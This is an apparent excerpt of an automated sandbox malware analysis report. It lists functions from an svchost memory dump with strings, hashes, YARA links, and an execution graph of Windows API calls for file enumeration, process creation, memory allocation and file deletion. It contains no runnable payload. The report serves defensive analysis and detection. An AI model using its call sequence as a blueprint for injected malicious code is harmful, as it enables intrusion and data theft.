                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03CA4655
                                                                                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 03CA46FC
                                                                                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03CA4725
                                                                                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03CA4742
                                                                                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 03CA4787
                                                                                                                  • ExecuteOptions, xrefs: 03CA46A0
                                                                                                                  • Execute=1, xrefs: 03CA4713
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                  • API String ID: 0-484625025
                                                                                                                  • Opcode ID: 1c6f53650ccb40283799fe10f8040436b39d97cfbb627499b81fb7a745151332
                                                                                                                  • Instruction ID: 06b9f57d481f30b6d1324014d8eb9986d75efd06abc0d947a6222a4263b94bae
                                                                                                                  • Opcode Fuzzy Hash: 1c6f53650ccb40283799fe10f8040436b39d97cfbb627499b81fb7a745151332
                                                                                                                  • Instruction Fuzzy Hash: E8511735A003196ADB25EBA9DCC5FAE73B8AF04308F0804A9D505EF281E770EA419B50
                                                                                                                  Function 03C7B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __aulldvrm
                                                                                                                  • String ID: +$-$0$0
                                                                                                                  • API String ID: 1302938615-699404926
                                                                                                                  • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                  • Instruction ID: 34d7a80f866803ea96099025eacc2307bae200f9dd0d7ef8311687fdf6967e29
                                                                                                                  • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                  • Instruction Fuzzy Hash: 7D81AF74E452499EDF28CE69C8917FEBBB5AF45350F1C425AEC61EB390C7349E408B60
                                                                                                                  Function 03C5F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 03CA02BD
                                                                                                                  • RTL: Re-Waiting, xrefs: 03CA031E
                                                                                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 03CA02E7
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                  • API String ID: 0-2474120054
                                                                                                                  • Opcode ID: 80f615509c55bee5a8fbc5557b6c354e971492a0ddee51d2ba228251dccf47b1
                                                                                                                  • Instruction ID: b48dd6e33cae6828f470beb5e4377074818ba2f757c513872737d7287a0a4653
                                                                                                                  • Opcode Fuzzy Hash: 80f615509c55bee5a8fbc5557b6c354e971492a0ddee51d2ba228251dccf47b1
                                                                                                                  • Instruction Fuzzy Hash: 5BE1B031604B42DFD728CF28C884B6AB7E0BB85358F180A5DF9A5CB2D1D775E984CB46
                                                                                                                  Function 03C6BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  • RTL: Re-Waiting, xrefs: 03CA7BAC
                                                                                                                  • RTL: Resource at %p, xrefs: 03CA7B8E
                                                                                                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 03CA7B7F
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                  • API String ID: 0-871070163
                                                                                                                  • Opcode ID: 91ee4a63170b419d9167b136cf6e3bc633a358f36bed3f03636805aa3cb5f59d
                                                                                                                  • Instruction ID: ec8330e975c7650e24055be146c3fcb55e893f51878979c81df99d1cc1424b3e
                                                                                                                  • Opcode Fuzzy Hash: 91ee4a63170b419d9167b136cf6e3bc633a358f36bed3f03636805aa3cb5f59d
                                                                                                                  • Instruction Fuzzy Hash: 2341E5397047029FC724DE6ADC80B6AB7E9FF84710F140A2DE956DF690DB30E9058B92
                                                                                                                  Function 03C6B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 03CA728C
                                                                                                                  Strings
                                                                                                                  • RTL: Re-Waiting, xrefs: 03CA72C1
                                                                                                                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 03CA7294
                                                                                                                  • RTL: Resource at %p, xrefs: 03CA72A3
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                  • API String ID: 885266447-605551621
                                                                                                                  • Opcode ID: 841dd5f8802488c8e6727995ca81adc7fb992f5a7badcdbd3b8e057a8c326018
                                                                                                                  • Instruction ID: d9f05128909cebfc15da59a1f08ae3aaf03a5f25a2ffc3fd96c899188efcd288
                                                                                                                  • Opcode Fuzzy Hash: 841dd5f8802488c8e6727995ca81adc7fb992f5a7badcdbd3b8e057a8c326018
                                                                                                                  • Instruction Fuzzy Hash: 3641EE35600B06ABC720DE6ACC81B6AB7A5FB84718F144629F895EB240DB21F9529BD1
                                                                                                                  Function 03C77D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __aulldvrm
                                                                                                                  • String ID: +$-
                                                                                                                  • API String ID: 1302938615-2137968064
                                                                                                                  • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                  • Instruction ID: 496ba0ddffc164ef3be77e7d9607d1638b2546ec5716a4f03d6fcad8134fbe6e
                                                                                                                  • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                  • Instruction Fuzzy Hash: D491A170E0021E9FDF24DE69CD85ABEB7A5EF44360F18851AEC65EB2C0D7309A418B60
                                                                                                                  Function 03C39126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: $$@
                                                                                                                  • API String ID: 0-1194432280
                                                                                                                  • Opcode ID: b8b59842621210d6a43b77628b99d3814a5ea1cd71b293743381447bf040af07
                                                                                                                  • Instruction ID: 6f1e881fbeb022f4a0fa1fbfcd48d6c0d75139eebf8b1b87225491d8be405923
                                                                                                                  • Opcode Fuzzy Hash: b8b59842621210d6a43b77628b99d3814a5ea1cd71b293743381447bf040af07
                                                                                                                  • Instruction Fuzzy Hash: 51812B76D002699BDB31DF54CC48BEEB7B8AB08710F0545DAA919FB280D7709E84DFA0

                                                                                                                  Execution Graph

                                                                                                                  Execution Coverage:3.1%
                                                                                                                  Dynamic/Decrypted Code Coverage:4.2%
                                                                                                                  Signature Coverage:2.2%
                                                                                                                  Total number of Nodes:455
                                                                                                                  Total number of Limit Nodes:72
                                                                                                                  execution_graph 81663 5c265a 81666 5c6190 81663->81666 81665 5c2693 81667 5c61c3 81666->81667 81668 5c61e7 81667->81668 81673 5d8db0 81667->81673 81668->81665 81670 5c620a 81670->81668 81677 5d9250 81670->81677 81672 5c628a 81672->81665 81674 5d8dcd 81673->81674 81680 3172ca0 LdrInitializeThunk 81674->81680 81675 5d8df9 81675->81670 81678 5d926d 81677->81678 81679 5d927e NtClose 81678->81679 81679->81672 81680->81675 81681 3172ad0 LdrInitializeThunk 81682 5b9a50 81685 5b9e4e 81682->81685 81684 5ba2b0 81685->81684 81686 5daf80 81685->81686 81687 5dafa6 81686->81687 81692 5b4050 81687->81692 81689 5dafb2 81690 5dafeb 81689->81690 81695 5d54e0 81689->81695 81690->81684 81699 5c30e0 81692->81699 81694 5b405d 81694->81689 81696 5d5541 81695->81696 81698 5d554e 81696->81698 81723 5c18e0 81696->81723 81698->81690 81700 5c30fd 81699->81700 81702 5c3116 81700->81702 81703 5d9ca0 81700->81703 81702->81694 81705 5d9cba 81703->81705 81704 5d9ce9 81704->81702 81705->81704 81710 5d88a0 81705->81710 81711 5d88bd 81710->81711 81717 3172c0a 81711->81717 81712 5d88e9 81714 5db320 81712->81714 81720 5d95b0 81714->81720 81716 5d9d62 81716->81702 81718 3172c1f LdrInitializeThunk 81717->81718 81719 3172c11 81717->81719 81718->81712 81719->81712 81721 5d95cd 81720->81721 81722 5d95de RtlFreeHeap 81721->81722 81722->81716 81724 5c191b 81723->81724 81739 5c7d70 81724->81739 81726 5c1923 81738 5c1bf7 81726->81738 81750 5db400 81726->81750 81728 5c1939 81729 5db400 RtlAllocateHeap 81728->81729 81730 5c194a 81729->81730 81731 5db400 RtlAllocateHeap 81730->81731 81733 5c195b 81731->81733 81732 5c19fb 81753 5c4430 81732->81753 81733->81732 81762 5c68f0 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 81733->81762 81736 5c1bb2 81758 5d7e20 81736->81758 81738->81698 81740 5c7d9c 81739->81740 81763 5c7c60 81740->81763 81743 5c7dc9 81746 5d9250 NtClose 81743->81746 81748 5c7dd4 81743->81748 81744 5c7de1 81745 5c7dfd 81744->81745 81747 5d9250 NtClose 81744->81747 81745->81726 81746->81748 81749 5c7df3 81747->81749 81748->81726 81749->81726 81774 5d9560 81750->81774 81752 5db41b 81752->81728 81756 5c4454 81753->81756 81754 5c445b 81754->81736 81755 5c44a7 81755->81736 81756->81754 81756->81755 81757 5c44a0 LdrLoadDll 81756->81757 81757->81755 81759 5d7e81 81758->81759 81761 5d7e8e 81759->81761 81777 5c1c10 81759->81777 81761->81738 81762->81732 81764 5c7c7a 81763->81764 81768 5c7d56 81763->81768 81769 5d8940 81764->81769 81767 5d9250 NtClose 81767->81768 81768->81743 81768->81744 81770 5d895d 81769->81770 81773 31735c0 LdrInitializeThunk 81770->81773 81771 5c7d4a 81771->81767 81773->81771 81775 5d957a 81774->81775 81776 5d958b RtlAllocateHeap 81775->81776 81776->81752 81793 5c8040 81777->81793 81779 5c2180 81779->81761 81780 5c1c30 81780->81779 81797 5d0ff0 81780->81797 81783 5c1e45 81805 5dc610 81783->81805 81784 5c1c8b 81784->81779 81800 5dc4e0 81784->81800 81787 5c1e5a 81789 5c1ea7 81787->81789 81811 5c0730 81787->81811 81789->81779 81791 5c0730 LdrInitializeThunk 81789->81791 81815 5c7fe0 81789->81815 81790 5c7fe0 LdrInitializeThunk 81792 5c1ff8 81790->81792 81791->81789 81792->81789 81792->81790 81794 5c804d 81793->81794 81795 5c806b SetErrorMode 81794->81795 81796 5c8072 81794->81796 81795->81796 81796->81780 81819 5db290 81797->81819 81799 5d1011 81799->81784 81801 5dc4f6 81800->81801 81802 5dc4f0 81800->81802 81803 5db400 RtlAllocateHeap 81801->81803 81802->81783 81804 5dc51c 81803->81804 81804->81783 81806 5dc580 81805->81806 81807 5dc5dd 81806->81807 81808 5db400 RtlAllocateHeap 81806->81808 81807->81787 81809 5dc5ba 81808->81809 81810 5db320 RtlFreeHeap 81809->81810 81810->81807 81812 5c0746 81811->81812 81826 5d94d0 81812->81826 81816 5c7ff3 81815->81816 81831 5d87a0 81816->81831 81818 5c801e 81818->81789 81822 5d93b0 81819->81822 81821 5db2c1 81821->81799 81823 5d9445 81822->81823 81825 5d93db 81822->81825 81824 5d945b NtAllocateVirtualMemory 81823->81824 81824->81821 81825->81821 81827 5d94ea 81826->81827 81830 3172c70 LdrInitializeThunk 81827->81830 81828 5c0752 81828->81792 81830->81828 81832 5d8821 81831->81832 81834 5d87ce 81831->81834 81836 3172dd0 LdrInitializeThunk 81832->81836 81833 5d8846 81833->81818 81834->81818 81836->81833 81837 5cc4d0 81838 5cc4f9 81837->81838 81839 5cc5fc 81838->81839 81840 5cc59e FindFirstFileW 81838->81840 81840->81839 81842 5cc5b9 81840->81842 81841 5cc5e3 FindNextFileW 81841->81842 81843 5cc5f5 FindClose 81841->81843 81842->81841 81843->81839 81844 5c5a90 81845 5c7fe0 LdrInitializeThunk 81844->81845 81846 5c5ac0 81845->81846 81849 5c7f60 81846->81849 81848 5c5ae5 81851 5c7f93 81849->81851 81850 5c7fc5 81850->81848 81851->81850 81856 5d8570 81851->81856 81853 5c7fb5 81854 5c7fd1 81853->81854 81855 5d9250 NtClose 81853->81855 81854->81848 81855->81850 81857 5d85f0 81856->81857 81859 5d859e 81856->81859 81861 3174650 LdrInitializeThunk 81857->81861 81858 5d8615 81858->81853 81859->81853 81861->81858 81862 5d8850 81863 5d886a 81862->81863 81866 3172df0 LdrInitializeThunk 81863->81866 81864 5d8892 81866->81864 81867 5d86d0 81868 5d875f 81867->81868 81870 5d86fb 81867->81870 81872 3172ee0 LdrInitializeThunk 81868->81872 81869 5d8790 81872->81869 81873 5d8f50 81874 5d900a 81873->81874 81876 5d8f82 81873->81876 81875 5d9020 NtCreateFile 81874->81875 81877 5d5f50 81878 5d5faa 81877->81878 81880 5d5fb7 81878->81880 81881 5d3970 81878->81881 81882 5d3978 81881->81882 81883 5db290 NtAllocateVirtualMemory 81882->81883 81885 5d39b1 81883->81885 81884 5d3ab0 81884->81880 81885->81884 81886 5c4430 LdrLoadDll 81885->81886 81888 5d39f7 81886->81888 81887 5d3a32 Sleep 81887->81888 81888->81884 81888->81887 81889 5c2209 81890 5c2219 81889->81890 81891 5c21b6 81889->81891 81892 5d88a0 LdrInitializeThunk 81891->81892 81893 5c21c6 81892->81893 81896 5d92e0 81893->81896 81895 5c21db 81897 5d9372 81896->81897 81898 5d930e 81896->81898 81901 3172e80 LdrInitializeThunk 81897->81901 81898->81895 81899 5d93a3 81899->81895 81901->81899 81902 5bb440 81903 5db290 NtAllocateVirtualMemory 81902->81903 81904 5bcab1 81903->81904 81905 5d56c0 81906 5d5722 81905->81906 81907 5d572f 81906->81907 81909 5c7290 81906->81909 81910 5c7261 81909->81910 81912 5c727e 81909->81912 81910->81912 81913 5cb160 81910->81913 81912->81907 81915 5cb186 81913->81915 81914 5cb3a0 81914->81912 81915->81914 81940 5d9640 81915->81940 81917 5cb1f9 81917->81914 81918 5dc610 2 API calls 81917->81918 81919 5cb218 81918->81919 81919->81914 81920 5cb2e4 81919->81920 81921 5d88a0 LdrInitializeThunk 81919->81921 81923 5c5a10 LdrInitializeThunk 81920->81923 81924 5cb2ff 81920->81924 81922 5cb27a 81921->81922 81922->81920 81927 5cb283 81922->81927 81923->81924 81928 5cb388 81924->81928 81946 5d8410 81924->81946 81925 5cb2cc 81929 5c7fe0 LdrInitializeThunk 81925->81929 81926 5cb2b1 81961 5d4670 LdrInitializeThunk 81926->81961 81927->81914 81927->81925 81927->81926 81943 5c5a10 81927->81943 81930 5c7fe0 LdrInitializeThunk 81928->81930 81934 5cb2da 81929->81934 81935 5cb396 81930->81935 81934->81912 81935->81912 81936 5cb35f 81951 5d84c0 81936->81951 81938 5cb379 81956 5d8620 81938->81956 81941 5d965a 81940->81941 81942 5d966b CreateProcessInternalW 81941->81942 81942->81917 81962 5d8a70 81943->81962 81945 5c5a4b 81945->81926 81947 5d848d 81946->81947 81948 5d843b 81946->81948 81968 31739b0 LdrInitializeThunk 81947->81968 81948->81936 81949 5d84b2 81949->81936 81952 5d8540 81951->81952 81953 5d84ee 81951->81953 81969 3174340 LdrInitializeThunk 81952->81969 81953->81938 81954 5d8565 81954->81938 81957 5d864b 81956->81957 81958 5d869d 81956->81958 81957->81928 81970 3172fb0 LdrInitializeThunk 81958->81970 81959 5d86c2 81959->81928 81961->81925 81963 5d8b21 81962->81963 81965 5d8a9f 81962->81965 81967 3172d10 LdrInitializeThunk 81963->81967 81964 5d8b66 81964->81945 81965->81945 81967->81964 81968->81949 81969->81954 81970->81959 81971 5dc540 81972 5db320 RtlFreeHeap 81971->81972 81973 5dc555 81972->81973 81974 5d1939 81975 5d193f 81974->81975 81976 5d9250 NtClose 81975->81976 81978 5d1944 81975->81978 81977 5d1969 81976->81977 81980 5c86f7 81981 5c86fa 81980->81981 81982 5c86b1 81981->81982 81984 5c6e70 LdrInitializeThunk LdrInitializeThunk 81981->81984 81984->81982 81985 5b99f0 81986 5b99ff 81985->81986 81987 5b9a3d 81986->81987 81988 5b9a2a CreateThread 81986->81988 81989 5cac30 81994 5ca940 81989->81994 81991 5cac3d 82008 5ca5b0 81991->82008 81993 5cac59 81995 5ca965 81994->81995 82019 5c8250 81995->82019 81998 5caab3 81998->81991 82000 5caaca 82000->81991 82001 5caac1 82001->82000 82003 5cabb7 82001->82003 82038 5ca000 82001->82038 82005 5cac1a 82003->82005 82047 5ca370 82003->82047 82006 5db320 RtlFreeHeap 82005->82006 82007 5cac21 82006->82007 82007->81991 82009 5ca5c6 82008->82009 82016 5ca5d1 82008->82016 82010 5db400 RtlAllocateHeap 82009->82010 82010->82016 82011 5ca5f8 82011->81993 82012 5c8250 GetFileAttributesW 82012->82016 82013 5ca912 82014 5ca92b 82013->82014 82015 5db320 RtlFreeHeap 82013->82015 82014->81993 82015->82014 82016->82011 82016->82012 82016->82013 82017 5ca000 RtlFreeHeap 82016->82017 82018 5ca370 RtlFreeHeap 82016->82018 82017->82016 82018->82016 82020 5c826e 82019->82020 82021 5c8280 82020->82021 82022 5c8275 GetFileAttributesW 82020->82022 82021->81998 82023 5d3240 82021->82023 82022->82021 82024 5d324e 82023->82024 82025 5d3255 82023->82025 82024->82001 82026 5c4430 LdrLoadDll 82025->82026 82027 5d328a 82026->82027 82028 5d3299 82027->82028 82051 5d2d00 LdrLoadDll 82027->82051 82029 5db400 RtlAllocateHeap 82028->82029 82034 5d3447 82028->82034 82031 5d32b2 82029->82031 82032 5d343d 82031->82032 82031->82034 82035 5d32ce 82031->82035 82033 5db320 RtlFreeHeap 82032->82033 82032->82034 82033->82034 82034->82001 82035->82034 82036 5db320 RtlFreeHeap 82035->82036 82037 5d3431 82036->82037 82037->82001 82039 5ca026 82038->82039 82052 5cda40 82039->82052 82041 5ca09b 82043 5ca220 82041->82043 82045 5ca0b9 82041->82045 82042 5ca205 82042->82001 82043->82042 82044 5c9ec0 RtlFreeHeap 82043->82044 82044->82043 82045->82042 82057 5c9ec0 82045->82057 82048 5ca396 82047->82048 82049 5cda40 RtlFreeHeap 82048->82049 82050 5ca41d 82049->82050 82050->82003 82051->82028 82054 5cda4a 82052->82054 82053 5cda71 82053->82041 82054->82053 82055 5db320 RtlFreeHeap 82054->82055 82056 5cdab4 82055->82056 82056->82041 82058 5c9edd 82057->82058 82061 5cdad0 82058->82061 82060 5c9fe3 82060->82045 82063 5cdaf4 82061->82063 82062 5cdb9e 82062->82060 82063->82062 82064 5db320 RtlFreeHeap 82063->82064 82064->82062 82065 5c7030 82066 5c704c 82065->82066 82068 5c709f 82065->82068 82066->82068 82069 5d9250 NtClose 82066->82069 82067 5c71d7 82068->82067 82076 5c6420 NtClose LdrInitializeThunk LdrInitializeThunk 82068->82076 82070 5c7067 82069->82070 82075 5c6420 NtClose LdrInitializeThunk LdrInitializeThunk 82070->82075 82072 5c71b1 82072->82067 82077 5c65f0 NtClose LdrInitializeThunk LdrInitializeThunk 82072->82077 82075->82068 82076->82072 82077->82067 82078 5cf6f0 82079 5cf754 82078->82079 82080 5c6190 2 API calls 82079->82080 82082 5cf887 82080->82082 82081 5cf88e 82082->82081 82107 5c62a0 82082->82107 82084 5cfa33 82085 5cf90a 82085->82084 82086 5cfa42 82085->82086 82111 5cf4d0 82085->82111 82087 5d9250 NtClose 82086->82087 82089 5cfa4c 82087->82089 82090 5cf946 82090->82086 82091 5cf951 82090->82091 82092 5db400 RtlAllocateHeap 82091->82092 82093 5cf97a 82092->82093 82094 5cf999 82093->82094 82095 5cf983 82093->82095 82120 5cf3c0 CoInitialize 82094->82120 82096 5d9250 NtClose 82095->82096 82099 5cf98d 82096->82099 82098 5cf9a7 82123 5d8d10 82098->82123 82101 5cfa22 82102 5d9250 NtClose 82101->82102 82103 5cfa2c 82102->82103 82104 5db320 RtlFreeHeap 82103->82104 82104->82084 82105 5cf9c5 82105->82101 82106 5d8d10 LdrInitializeThunk 82105->82106 82106->82105 82108 5c62c5 82107->82108 82127 5d8bc0 82108->82127 82112 5cf4ec 82111->82112 82113 5c4430 LdrLoadDll 82112->82113 82115 5cf50a 82113->82115 82114 5cf513 82114->82090 82115->82114 82116 5c4430 LdrLoadDll 82115->82116 82117 5cf5de 82116->82117 82118 5c4430 LdrLoadDll 82117->82118 82119 5cf63b 82117->82119 82118->82119 82119->82090 82122 5cf425 82120->82122 82121 5cf4bb CoUninitialize 82121->82098 82122->82121 82124 5d8d2a 82123->82124 82132 3172ba0 LdrInitializeThunk 82124->82132 82125 5d8d5a 82125->82105 82128 5d8bdd 82127->82128 82131 3172c60 LdrInitializeThunk 82128->82131 82129 5c6339 82129->82085 82131->82129 82132->82125 82133 5cfff0 82134 5d000d 82133->82134 82135 5c4430 LdrLoadDll 82134->82135 82136 5d002b 82135->82136 82137 5d11b1 82138 5d11bd 82137->82138 82150 5d90c0 82138->82150 82140 5d1205 82143 5d9250 NtClose 82140->82143 82141 5d11f0 82142 5d9250 NtClose 82141->82142 82145 5d11f9 82142->82145 82146 5d120e 82143->82146 82144 5d11d2 82144->82140 82144->82141 82147 5d1245 82146->82147 82148 5db320 RtlFreeHeap 82146->82148 82149 5d1239 82148->82149 82151 5d9167 82150->82151 82153 5d90eb 82150->82153 82152 5d917d NtReadFile 82151->82152 82152->82144 82153->82144 82164 5d19b0 82169 5d19c9 82164->82169 82165 5d1a5c 82166 5d1a14 82167 5db320 RtlFreeHeap 82166->82167 82168 5d1a24 82167->82168 82169->82165 82169->82166 82170 5d1a57 82169->82170 82171 5db320 RtlFreeHeap 82170->82171 82171->82165 82172 5d91b0 82173 5d9227 82172->82173 82175 5d91db 82172->82175 82174 5d923d NtDeleteFile 82173->82174 82176 5c9af3 82177 5c9aff 82176->82177 82178 5c9b06 82177->82178 82179 5db320 RtlFreeHeap 82177->82179 82179->82178 82182 5c6c60 82183 5c6c8a 82182->82183 82186 5c7e10 82183->82186 82185 5c6cb1 82187 5c7e2d 82186->82187 82193 5d8990 82187->82193 82189 5c7e7d 82190 5c7e84 82189->82190 82191 5d8a70 LdrInitializeThunk 82189->82191 82190->82185 82192 5c7ead 82191->82192 82192->82185 82194 5d8a2e 82193->82194 82196 5d89be 82193->82196 82198 3172f30 LdrInitializeThunk 82194->82198 82195 5d8a67 82195->82189 82196->82189 82198->82195 82199 5c0ca0 82200 5c0cba 82199->82200 82201 5c4430 LdrLoadDll 82200->82201 82202 5c0cd8 82201->82202 82203 5c0d0c PostThreadMessageW 82202->82203 82204 5c0d1d 82202->82204 82203->82204 82210 5d1620 82211 5d163c 82210->82211 82212 5d1678 82211->82212 82213 5d1664 82211->82213 82215 5d9250 NtClose 82212->82215 82214 5d9250 NtClose 82213->82214 82216 5d166d 82214->82216 82217 5d1681 82215->82217 82220 5db440 RtlAllocateHeap 82217->82220 82219 5d168c 82220->82219 82221 5c2fe3 82222 5c7c60 2 API calls 82221->82222 82223 5c2ff3 82222->82223 82224 5c300f 82223->82224 82225 5d9250 NtClose 82223->82225 82225->82224

                                                                                                                  Executed Functions

                                                                                                                  Function 005B9A50 Relevance: 37.9, Strings: 30, Instructions: 415COMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 29 5b9a50-5b9e4c 30 5b9e5d-5b9e64 29->30 31 5b9e8d-5b9e9e 30->31 32 5b9e66-5b9e8b 30->32 33 5b9eaf-5b9ebb 31->33 32->30 35 5b9ebd-5b9ec6 33->35 36 5b9ed3-5b9edd 33->36 37 5b9ec8-5b9ece 35->37 38 5b9ed1 35->38 39 5b9eee-5b9efa 36->39 37->38 38->33 41 5b9efc-5b9f0f 39->41 42 5b9f11-5b9f22 39->42 41->39 43 5b9f33-5b9f3f 42->43 45 5b9f41-5b9f54 43->45 46 5b9f56 43->46 45->43 47 5b9f5d-5b9f76 46->47 47->47 49 5b9f78-5b9f82 47->49 50 5b9f93-5b9f9c 49->50 51 5b9fba-5b9fc3 50->51 52 5b9f9e-5b9faa 50->52 55 5b9fc9-5b9fd3 51->55 56 5ba266-5ba26d 51->56 53 5b9fb8 52->53 54 5b9fac-5b9fb2 52->54 53->50 54->53 60 5b9fe4-5b9fed 55->60 57 5ba26f-5ba279 56->57 58 5ba2b0-5ba2c9 56->58 64 5ba28a-5ba293 57->64 58->58 63 5ba2cb-5ba2d4 58->63 61 5b9fef-5b9fff 60->61 62 5ba012-5ba019 60->62 65 5ba001-5ba00a 61->65 66 5ba010 61->66 67 5ba01b-5ba04c 62->67 68 5ba04e-5ba058 62->68 69 5ba2f9-5ba300 63->69 70 5ba2d6-5ba2f7 63->70 71 5ba2ab call 5daf80 64->71 72 5ba295-5ba29e 64->72 65->66 66->60 67->62 75 5ba069-5ba075 68->75 76 5ba302-5ba31f 69->76 77 5ba321-5ba328 69->77 70->63 71->58 78 5ba2a9 72->78 79 5ba2a0-5ba2a6 72->79 81 5ba088-5ba09b 75->81 82 5ba077-5ba086 75->82 76->69 83 5ba32a-5ba340 77->83 84 5ba34d-5ba356 77->84 80 5ba27b-5ba284 78->80 79->78 80->64 88 5ba0ac-5ba0b6 81->88 82->75 86 5ba34b 83->86 87 5ba342-5ba348 83->87 86->77 87->86 89 5ba0b8-5ba0ca 88->89 90 5ba0cc-5ba0db 88->90 89->88 92 5ba0dd-5ba0e7 90->92 93 5ba11c-5ba123 90->93 96 5ba0f8-5ba101 92->96 94 5ba14a-5ba154 93->94 95 5ba125-5ba148 93->95 99 5ba165-5ba16e 94->99 95->93 97 5ba103-5ba115 96->97 98 5ba117 96->98 97->96 98->56 101 5ba181-5ba18b 99->101 102 5ba170-5ba17f 99->102 104 5ba19c-5ba1a8 101->104 102->99 105 5ba1aa-5ba1bd 104->105 106 5ba1bf-5ba1c5 104->106 105->104 108 5ba1c9-5ba1d0 106->108 109 5ba1d2-5ba1f5 108->109 110 5ba1f7-5ba200 108->110 109->108 111 5ba202-5ba223 110->111 112 5ba225-5ba22f 110->112 111->110 113 5ba240-5ba249 112->113 114 5ba24b-5ba254 113->114 115 5ba261 113->115 116 5ba25f 114->116 117 5ba256-5ba259 114->117 115->51 116->113 117->116
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
